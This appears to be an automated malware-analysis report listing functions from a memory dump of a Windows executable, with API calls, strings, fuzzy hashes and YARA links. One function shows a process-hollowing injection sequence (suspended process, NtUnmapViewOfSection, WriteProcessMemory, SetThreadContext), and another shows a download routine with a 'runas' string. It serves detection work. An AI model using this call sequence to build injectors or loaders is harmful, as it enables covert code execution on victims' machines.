Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AttributesFile
String ID: VWh@B
API String ID: 3188754299-636108645
Opcode ID: 5de5d0c474cd93400c41c143ce6099d788fd7c0c65ddcd94f9547f129e0c8230
Instruction ID: d3f8639d0b102931445c1db3b465760511ada51e673a3672cef23d9828002821
Opcode Fuzzy Hash: 5de5d0c474cd93400c41c143ce6099d788fd7c0c65ddcd94f9547f129e0c8230
Instruction Fuzzy Hash: 8E815871B102045BEB18EB28CD85BEF7A66EF45304F50462EF404A72C2D77DDAD08B99

Uniqueness

Uniqueness Score: -1.00%

Function 004055D3, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 272COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 004055D6

Strings

VWh@B, xrefs: 00405AC9

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AttributesFile
String ID: VWh@B
API String ID: 3188754299-636108645
Opcode ID: 730a2d71e4157dc173ea392bd48b3ff43fb19f5bd86af38d4fc924f86857d777
Instruction ID: 36ee0c1bf9db6cba1797e79955325d91819aaa6b821195d34e2e579db0b22ade
Opcode Fuzzy Hash: 730a2d71e4157dc173ea392bd48b3ff43fb19f5bd86af38d4fc924f86857d777
Instruction Fuzzy Hash: D8816871A102045BEB08EB79CE85BEF7A66EF85304F50462EF404A72C2D77DD9D08B99

Uniqueness

Uniqueness Score: -1.00%

Function 00407A10, Relevance: 4.7, APIs: 3, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: PathTemp
String ID:
API String ID: 2920410445-0
Opcode ID: 3772cb1b0b0f52c6f44ec617606901ecd5a21c4c2530403ebc6941c7f758e0f5
Instruction ID: 9047be619bde0ab5b9466d8d1806ec62bd35e9fffed39b2be6f902ee876c092b
Opcode Fuzzy Hash: 3772cb1b0b0f52c6f44ec617606901ecd5a21c4c2530403ebc6941c7f758e0f5
Instruction Fuzzy Hash: 87710970E002089BEF14EFA8CD85BDEBB75EF45308F60416AD414772C2D779A989CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004128DB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

@=@, xrefs: 004128E1, 0041290C, 00412912, 0041291A, 00412945

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: @=@
API String ID: 0-2481937916
Opcode ID: 343fd606807bc7cb61a777f388e67a2b0fe61435e284bae2ca657a2c5bc1dc2a
Instruction ID: c018ffe9aa6b3c24984962dfe99c5e7737d8de021b5c81769c92025734610f07
Opcode Fuzzy Hash: 343fd606807bc7cb61a777f388e67a2b0fe61435e284bae2ca657a2c5bc1dc2a
Instruction Fuzzy Hash: AAF0F972611A105AC6213A6EDE05BEB33588F92378F11032FF465D25D1DBBCD8D285ED

Uniqueness

Uniqueness Score: -1.00%

Function 0041E04B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041E0AE

Strings

~iA, xrefs: 0041E04D

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free
String ID: ~iA
API String ID: 269201875-348798368
Opcode ID: 9ba8c6d62c837557b7d10db139ff9f6489b14aed1980b721ae02a396919f42ec
Instruction ID: 4f46261fae99ec6cd11cdcbd1baa5a1555b052f0f75325508cb1b0be62a83613
Opcode Fuzzy Hash: 9ba8c6d62c837557b7d10db139ff9f6489b14aed1980b721ae02a396919f42ec
Instruction Fuzzy Hash: F1018F72C00169AFCF01AFA98C019EE7FB5BF08314F14416AFD14E21A1E6758AA1DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00416FCC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,R7A,0041BE84,00000220,?,?,?,?,?,?,00413752,?), ref: 00416FFE

Strings

R7A, xrefs: 00416FCE

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AllocateHeap
String ID: R7A
API String ID: 1279760036-27652862
Opcode ID: fc944653881f963902f547bb5c6912966d41a2891154654c83235c562d7fad4a
Instruction ID: 7dd32bafd1a22ce081eb514eb2c38dd91e870d9526c2abf938b2464997044ddd
Opcode Fuzzy Hash: fc944653881f963902f547bb5c6912966d41a2891154654c83235c562d7fad4a
Instruction Fuzzy Hash: ADE0E53260835066E63226269C04BDB3A58AB653F5F06023BAC0696280DB6CCCC181AD

Uniqueness

Uniqueness Score: -1.00%

Function 00407DF3, Relevance: 3.1, APIs: 2, Instructions: 126COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000), ref: 00407E05
GetFileAttributesA.KERNELBASE(?), ref: 00407E17

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: c21bfed477ca0392bdace23735bb6c06d7e7cd4c06d64ac850f87b97899b849a
Instruction ID: 06e18163c94ccd8802ac3e9955c642de536ada1618bbda9f1cf585d8f7755c4a
Opcode Fuzzy Hash: c21bfed477ca0392bdace23735bb6c06d7e7cd4c06d64ac850f87b97899b849a
Instruction Fuzzy Hash: 74412771E001085BDF04EB78CDC679DBB36EF45314F64067AE910B36C2D638AD91479A

Uniqueness

Uniqueness Score: -1.00%

Function 004156BE, Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00415706

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 205bf19807add791a85ead2d81fc34a55cf9dee98809ed6e7c68da7aaf3a2f29
Instruction ID: f8e22f4033e662f79a1d4bb835a345958dd280aebb30489147c12fb5bb15e54d
Opcode Fuzzy Hash: 205bf19807add791a85ead2d81fc34a55cf9dee98809ed6e7c68da7aaf3a2f29
Instruction Fuzzy Hash: BAE0E532641910C2E215723B6C812EB26816BC237AF12032BF438861D0EFBC88C2809E

Uniqueness

Uniqueness Score: -1.00%

Function 0041693F, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00416979

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 7b5d1ac85799531a7eb248b7423a59de2c9aa1309ef0f858493ac17e1a796466
Instruction ID: 74b2fad80937704efb9ceaf1913b87244c67f180a69aed1746e6824721084ae5
Opcode Fuzzy Hash: 7b5d1ac85799531a7eb248b7423a59de2c9aa1309ef0f858493ac17e1a796466
Instruction Fuzzy Hash: 1B114875A0010AAFCF05DF58E941DCB7BF8EF48304F05406AF804AB351D670E911CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041F4C5, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00416FCC: RtlAllocateHeap.NTDLL(00000000,?,?,R7A,0041BE84,00000220,?,?,?,?,?,?,00413752,?), ref: 00416FFE

_free.LIBCMT ref: 0041F4E5

Part of subcall function 00416AE1: HeapFree.KERNEL32(00000000,00000000,?,00415BDE), ref: 00416AF7
Part of subcall function 00416AE1: GetLastError.KERNEL32(?,?,00415BDE), ref: 00416B09

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: 3c714aec1bf226fc2e01c494d8da1e53dd7e86a2d5d7ffcc0f3378926a593196
Instruction ID: d5c950d400030d015791f98cad2334341912ddb08f837a5b08da2b600450db9e
Opcode Fuzzy Hash: 3c714aec1bf226fc2e01c494d8da1e53dd7e86a2d5d7ffcc0f3378926a593196
Instruction Fuzzy Hash: 66F062721057009FD3349F45E401B92F7F8EF80725F21842FE29A97591DBB4F4468B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041DD92, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,0041E182,?,?,00000000,?,0041E182,00000000,0000000C), ref: 0041DDAF

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a4f3ca33162476140f7698543601ef130894009958fc1919bb7b0093d516745f
Instruction ID: 310882c1f44202745fa20329ea89bf3de4982b55ebdca69bb8bc16e597be3c16
Opcode Fuzzy Hash: a4f3ca33162476140f7698543601ef130894009958fc1919bb7b0093d516745f
Instruction Fuzzy Hash: 1DD06C3210010DFFDF128F84DC06EDA3BAAFB4C714F414110BA1856060C732E832EB94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00402210, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 155injectionthreadmemoryCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,00000000), ref: 0040222C
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 00402285
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,00000000), ref: 0040229E
GetThreadContext.KERNEL32(?,00000000,?,00000000,00000000), ref: 004022B3
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,00000000), ref: 004022D6
GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,00000000), ref: 004022EE
GetProcAddress.KERNEL32(00000000), ref: 004022F5
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,00000000), ref: 00402314
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 0040232F
WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,00000000,00000000), ref: 0040236C
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,?,00000000,00000000), ref: 0040239C
SetThreadContext.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 004023B2
ResumeThread.KERNEL32(?,?,?,00000000,?,00000000,00000000), ref: 004023BB
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,?,00000000,00000000), ref: 004023C9
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000), ref: 004023E0

Strings

ntdll.dll, xrefs: 004022E9
NtUnmapViewOfSection, xrefs: 004022E4

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 4033543172-1050664331
Opcode ID: 694e550f7acac4b3a0a116b379a908a3549f8a12c4b0feab663f5f1cfe0d6a5b
Instruction ID: 77c305a1b78000a05565ebc602aa185a5b99abdfb4eb8a58e7b7a2995861df55
Opcode Fuzzy Hash: 694e550f7acac4b3a0a116b379a908a3549f8a12c4b0feab663f5f1cfe0d6a5b
Instruction Fuzzy Hash: AD517E71A41705BBEB208FA4EC45FAEBB78FF08705F504069FA04E62D0D7B4A856CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004068F0, Relevance: 12.3, APIs: 8, Instructions: 256networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(0042DDCC,00000000,00000000,00000000,00000000), ref: 0040691C
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0040693E
HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00406983

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: InternetOpen$ConnectHttpRequest
String ID:
API String ID: 3864186401-0
Opcode ID: 6a5b24602492c06de72ba4136e4c37cc93dceb9a4a24b64d108e5a2adab8932e
Instruction ID: a578690c9f00747dc8edbb4dba621dccc6e6f5ff2acdf6bb8bc7cdcd1768100e
Opcode Fuzzy Hash: 6a5b24602492c06de72ba4136e4c37cc93dceb9a4a24b64d108e5a2adab8932e
Instruction Fuzzy Hash: 3991B470A00208ABEF14EF64CD46BDE7B76EF45304F504169F901772C2D7B99A898BD5

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC53, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041ECD5
_free.LIBCMT ref: 0041ECF9
_free.LIBCMT ref: 0041EE86
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0042C5F8), ref: 0041EE98
_free.LIBCMT ref: 0041F052

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 635bb431743c72b77708263c202b1e203c5b247599234335c09264d6ea201efc
Instruction ID: a755d51ea31becc25e876d67a94eb41be8a5f88575333a93c45bde918789bba6
Opcode Fuzzy Hash: 635bb431743c72b77708263c202b1e203c5b247599234335c09264d6ea201efc
Instruction Fuzzy Hash: 3DC12B79A002059BCB24AF6BDC41AEA7BA9AF45314F14406FEC4097392E738DEC2C75C

Uniqueness

Uniqueness Score: -1.00%

Function 00404130, Relevance: 6.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00404186

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 7302dd456d94edbc5620f8203721618c1b4c39e347301a0a57c36c6b315110ee
Instruction ID: e3f613b691305e90426a6180d28c6389fe54768f3f018e3bf683f88e3854fc04
Opcode Fuzzy Hash: 7302dd456d94edbc5620f8203721618c1b4c39e347301a0a57c36c6b315110ee
Instruction Fuzzy Hash: 5E312870E00218A7DB20ABA8DC497DEBB74AF85354F5042BEED00672C1EB784A8587D9

Uniqueness

Uniqueness Score: -1.00%

Function 00414F83, Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0041507B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00415085
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415092

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: c4a0fb84c30a6a7a21433e88fe93e7157933b89728598a791f13f8c23606d1bc
Instruction ID: e17fa086c1f2062c204de1d39fb416f94094c290198dbb80947d2c2493f7da60
Opcode Fuzzy Hash: c4a0fb84c30a6a7a21433e88fe93e7157933b89728598a791f13f8c23606d1bc
Instruction Fuzzy Hash: 0231D474901218ABCB21DF65D8887CDBBB4BF58350F5041EAE41CA7291EB749BC18F48

Uniqueness

Uniqueness Score: -1.00%

Function 00410702, Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00410718

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 21942cac7d6e083e0ae4c1b93130913aac803fdb4a10e6fd2bff038813e9fedb
Instruction ID: ad3bee151a4cadd88f667da3fd9cbf4434239fb94637014e8427d9ecc5745f36
Opcode Fuzzy Hash: 21942cac7d6e083e0ae4c1b93130913aac803fdb4a10e6fd2bff038813e9fedb
Instruction Fuzzy Hash: 9C514EB19017158FEB18CF64DA816EAB7F4FB48314F24846AD915EB3A0D3B899C4CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041B5A4, Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfb51f73e84b5f4e98f786c084a271feff7c527449b021df09deaf6e7d79778a
Instruction ID: 0d957be09c1a76f648e6ee1d45f5ccf1f22e5129f802d8995118d0e4eac97e36
Opcode Fuzzy Hash: bfb51f73e84b5f4e98f786c084a271feff7c527449b021df09deaf6e7d79778a
Instruction Fuzzy Hash: C741A1B5804218AEDB249F69CC89AEABBB9EF55304F1442DEE41CD3211DA389E848F54

Uniqueness

Uniqueness Score: -1.00%

Function 00416432, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 591bd7156f51cb321b8d4752518cd4712fae8324a95c21c7b004677540a78980
Instruction ID: df0007144f132b0ce76dd5b1305e7af208aba66307e967c2a9a040a3b46bb383
Opcode Fuzzy Hash: 591bd7156f51cb321b8d4752518cd4712fae8324a95c21c7b004677540a78980
Instruction Fuzzy Hash: F6E08C72911228EBCB24DB89C90498AF3FCEB48B14B12409BB505D3240C278EE40CBD8

Uniqueness

Uniqueness Score: -1.00%

Function 0041D00D, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0041D051

Part of subcall function 0041CBEA: _free.LIBCMT ref: 0041CC07
Part of subcall function 0041CBEA: _free.LIBCMT ref: 0041CC19
Part of subcall function 0041CBEA: _free.LIBCMT ref: 0041CC2B
Part of subcall function 0041CBEA: _free.LIBCMT ref: 0041CC3D
Part of subcall function 0041CBEA: _free.LIBCMT ref: 0041CC4F
Part of subcall function 0041CBEA: _free.LIBCMT ref: 0041CC61
Part of subcall function 0041CBEA: _free.LIBCMT ref: 0041CC73
Part of subcall function 0041CBEA: _free.LIBCMT ref: 0041CC85
Part of subcall function 0041CBEA: _free.LIBCMT ref: 0041CC97
Part of subcall function 0041CBEA: _free.LIBCMT ref: 0041CCA9
Part of subcall function 0041CBEA: _free.LIBCMT ref: 0041CCBB
Part of subcall function 0041CBEA: _free.LIBCMT ref: 0041CCCD
Part of subcall function 0041CBEA: _free.LIBCMT ref: 0041CCDF

_free.LIBCMT ref: 0041D046

Part of subcall function 00416AE1: HeapFree.KERNEL32(00000000,00000000,?,00415BDE), ref: 00416AF7
Part of subcall function 00416AE1: GetLastError.KERNEL32(?,?,00415BDE), ref: 00416B09

_free.LIBCMT ref: 0041D068
_free.LIBCMT ref: 0041D07D
_free.LIBCMT ref: 0041D088
_free.LIBCMT ref: 0041D0AA
_free.LIBCMT ref: 0041D0BD
_free.LIBCMT ref: 0041D0CB
_free.LIBCMT ref: 0041D0D6
_free.LIBCMT ref: 0041D10E
_free.LIBCMT ref: 0041D115
_free.LIBCMT ref: 0041D132
_free.LIBCMT ref: 0041D14A

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 4a8b5a15acc7a14c50cd063d573e4647b370686c1df12e260f6979065f655518
Instruction ID: e086ba0a642d0056c0d540e80fe583659fc5c7e714910ce1c1d4b44718a4e31b
Opcode Fuzzy Hash: 4a8b5a15acc7a14c50cd063d573e4647b370686c1df12e260f6979065f655518
Instruction Fuzzy Hash: 72316CB2A40201AFDF20AA79D845BD777E9AF05355F11842FE489D6251DF38ECC1C628

Uniqueness

Uniqueness Score: -1.00%

Function 004023F0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 136networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00402491
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 004024A3
InternetReadFile.WININET(00000000,?,00032000,00032000), ref: 004024BA
InternetCloseHandle.WININET(00000000), ref: 004024CB
InternetCloseHandle.WININET(00000000), ref: 004024CE
InternetCloseHandle.WININET(00000000), ref: 004024DF
InternetCloseHandle.WININET(00000000), ref: 004024E2

Strings

Microsoft Internet Explorer, xrefs: 0040248C
<, xrefs: 0040266C
runas, xrefs: 00402685

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Internet$CloseHandle$Open$FileRead
String ID: <$Microsoft Internet Explorer$runas
API String ID: 4294395943-436926838
Opcode ID: 5f324a3500e7721d41fb36b18807298e40623e82f993214277c044bbf66b929c
Instruction ID: 8387eb781d5f027d5a32f78acc07e802638c5dccddccfd61030896c8b8110a95
Opcode Fuzzy Hash: 5f324a3500e7721d41fb36b18807298e40623e82f993214277c044bbf66b929c
Instruction Fuzzy Hash: 24410731E00219ABDB14DF64CD49BEEBB79EF45300F50806EE511B72D1D778AA85CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00405CE0, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 401COMMON

Download Yara Rule

Strings

(, xrefs: 00406364

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 2f6b4eaa928ba7e86c3892a41a4a6a32e62ad182e554b8f0af084e9b9855b0ba
Instruction ID: ac666e54c9ed784f768d283217f10768e394faffd9e5b71ff3a4bacdbe0a9330
Opcode Fuzzy Hash: 2f6b4eaa928ba7e86c3892a41a4a6a32e62ad182e554b8f0af084e9b9855b0ba
Instruction Fuzzy Hash: B4F1D370A002089BEF24EF64CD85BDEBBB5EF45304F6041AAE405772C6D7795A88CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004172BC, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004172D2

Part of subcall function 00416AE1: HeapFree.KERNEL32(00000000,00000000,?,00415BDE), ref: 00416AF7
Part of subcall function 00416AE1: GetLastError.KERNEL32(?,?,00415BDE), ref: 00416B09

_free.LIBCMT ref: 004172DE
_free.LIBCMT ref: 004172E9
_free.LIBCMT ref: 004172F4
_free.LIBCMT ref: 004172FF
_free.LIBCMT ref: 0041730A
_free.LIBCMT ref: 00417315
_free.LIBCMT ref: 00417320
_free.LIBCMT ref: 0041732B
_free.LIBCMT ref: 00417339

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ccf534bc0afc12efcd5a87e89bbbaf6dce8eae84f5d5b652619d855e8957afc0
Instruction ID: 244f9ab2be2b4331b7b5a03f6b61c93199fa28f959d378970d591e9f0fab5b09
Opcode Fuzzy Hash: ccf534bc0afc12efcd5a87e89bbbaf6dce8eae84f5d5b652619d855e8957afc0
Instruction Fuzzy Hash: 3E21B676A40118AFCF01EF95C881DDE7BB9BF08345F0181AAF915AB121DB35EE84CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00418939, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 318fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,@=@,00000000), ref: 00418981
__fassign.LIBCMT ref: 00418B60
__fassign.LIBCMT ref: 00418B7D
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00418BC5
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00418C05
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00418CB1

Strings

@=@, xrefs: 0041895A

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID: @=@
API String ID: 4031098158-2481937916
Opcode ID: a555f809e979dc77cf19c3ffc0946e968203519d07b9b892c39dcd0a6f84886d
Instruction ID: 15942b1fe4144a35f4d4276e4d188158915bb02eff24d86686838f8b57973d66
Opcode Fuzzy Hash: a555f809e979dc77cf19c3ffc0946e968203519d07b9b892c39dcd0a6f84886d
Instruction Fuzzy Hash: A2D1BF71D012489FCF15CFA8C9809EDBBB5FF48314F28416EE855B7341EA34A986CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00410F20, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00410F57
___except_validate_context_record.LIBVCRUNTIME ref: 00410F5F
_ValidateLocalCookies.LIBCMT ref: 00410FE8
__IsNonwritableInCurrentImage.LIBCMT ref: 00411013
_ValidateLocalCookies.LIBCMT ref: 00411068

Strings

csm, xrefs: 00411091
csm, xrefs: 00410FFD

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm$csm
API String ID: 1170836740-3733052814
Opcode ID: cf50ba54bd2bcde789faf3be0446d8b50eb5ecf1070a1215889f995bb55b74c3
Instruction ID: b1f1127e64f51ac7e6ce894ca234de6efbe50156e3c57d0e6bdfc5ba606d9957
Opcode Fuzzy Hash: cf50ba54bd2bcde789faf3be0446d8b50eb5ecf1070a1215889f995bb55b74c3
Instruction Fuzzy Hash: 0C51D334A01205EFCF24DF69C841ADEBBA6AF44314F14805BE9055B3A2D779D9C2CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041768E, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77COMMON

Download Yara Rule

Strings

ext-ms-, xrefs: 004176F9
R7A, xrefs: 00417690
api-ms-, xrefs: 004176E5

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: R7A$api-ms-$ext-ms-
API String ID: 0-2349488030
Opcode ID: 054441e2a6f2d78391f7b77552137bd509e5c50894b03ba509d60f7428c5f9d0
Instruction ID: b448bd95d69dfc1ab87e25054d7c6d0e6147f60035ec2af358bd9a24c7e5ceac
Opcode Fuzzy Hash: 054441e2a6f2d78391f7b77552137bd509e5c50894b03ba509d60f7428c5f9d0
Instruction Fuzzy Hash: D621DB31B49220ABDB3157249C41AAB37B49F117A0F260526FD25A73D1D738FD4286EC

Uniqueness

Uniqueness Score: -1.00%

Function 0041C425, Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0041C44F
_free.LIBCMT ref: 0041C528
_free.LIBCMT ref: 0041C555

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 6de38a0b80f8973536a5f2c91199d5e714f3c0817d6a9fc4abeb81e90eb3bfe4
Instruction ID: 3951da4b9c33d04ac262baf9d167e50b256924bca0f3cfe980d01d60aabe514d
Opcode Fuzzy Hash: 6de38a0b80f8973536a5f2c91199d5e714f3c0817d6a9fc4abeb81e90eb3bfe4
Instruction Fuzzy Hash: 0451F571984315AFDB24AF79CCC1AEE7BA4AF01314B10426FE510A7281EB7DDAC1CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 00406974, Relevance: 10.7, APIs: 7, Instructions: 247networkfileCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00406983
HttpSendRequestA.WININET(00000000,00000000,?), ref: 00406A2C
InternetReadFile.WININET(00000000,?,000003FF,?), ref: 00406ABD
InternetReadFile.WININET(00000000,00000000,000003FF,?), ref: 00406B44
InternetCloseHandle.WININET(00000000), ref: 00406B55
InternetCloseHandle.WININET(?), ref: 00406B5A
InternetCloseHandle.WININET(?), ref: 00406B5F

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Internet$CloseHandle$FileHttpReadRequest$OpenSend
String ID:
API String ID: 856522067-0
Opcode ID: 22764e221508dd3113fd5afd4bc4bde1a69ed1c99b13e83f2cf5ec22db7cdf79
Instruction ID: ecd77157117ea1a85d68d24bc0deef19ba66ecc03391244c18e4ff3178921827
